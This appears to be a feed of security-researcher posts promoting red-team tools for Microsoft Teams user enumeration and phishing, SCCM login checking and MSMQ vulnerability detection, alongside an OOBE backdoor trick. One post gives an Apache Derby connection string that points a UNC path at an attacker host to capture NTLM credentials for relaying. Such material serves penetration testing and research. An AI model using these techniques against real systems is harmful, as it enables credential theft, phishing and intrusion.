User Enumeration via Microsoft Teams could be useful during Red Team exercises and in preparation for phishing campaigns. This is described in my recent blog post. The new tool TeamsEnum could be used to find valid users. securesystems.de/blog/a-fresh-l… #osint #redteam #teams #recon

Published my latest Active Directory spotlight on SCCM. /CC: Chris Thompson , Charlie Bromberg « Shutdown » securesystems.de/blog/active-di…

Happy early 4th- TeamsPhisher is out now! Send messages + attachments to external Teams users for the purpose of phishing for access. This short project was a fun departure from all of the BOF and Post-ex stuff I typically focus on. github.com/Octoberfest7/T… #redteam #Malware

Threading support was added to TeamsEnum today. There don't seem to be any rate-limiting issues so far. Any issues or requests, feel free to contribute. github.com/sse-secure-sys…

My new metasploit module to detect the MSMQ RCE CVE-2023-21554, aka QueueJumper, was just published. Thanks to chompie, Fabius and Aaron Portnoy for the excellent write-up covering the vulnerability and the ideas for detecting affected hosts github.com/rapid7/metaspl…

Did anyone perform patch diffing of csagent.sys yet?

Ever found the Remote Control service of SCCM/MECM on TCP Port 2701? Turns out there is no easy way to check logins against the service on Linux where you could not use CmRcViewer.exe. So I wrote a script that could do it. It's available on github.com/bka-dev/CmRcAu… #infosec

Highly recommend this blog post of nuit - @[email protected] in which he demonstrates how flawed the Kekz headphones are, by reversing the hardware and firmware of this product. #infosec #reverseengineering

Except if you target ADCS servers due to the "Certificate Service DCOM Access" group and their only member "Authenticated Users" 😄

Nice, thanks for your research! That matches quite well with the login check I wrote some weeks ago: github.com/bka-dev/CmRcAu…

This is very accurate #sccm

For what it's worth: bsky.app/profile/bka-se…

If you ever find an Apache Derby service running on a Windows machine, try to connect to it by specifying a UNC path as database name and include your address for NTLM relaying. Example connection string: jdbc:derby://<target>:1527/\\attacker\foobar;create=false #redteam

An alternative to Shift+F10 to open an administrative command prompt during the Windows initial setup and Out-of-Box-Experience (OOBE) -- video showcase of Bk 's newfound trick to revive a simple method for backdoors and unintended access: youtu.be/idogu3Y6ia8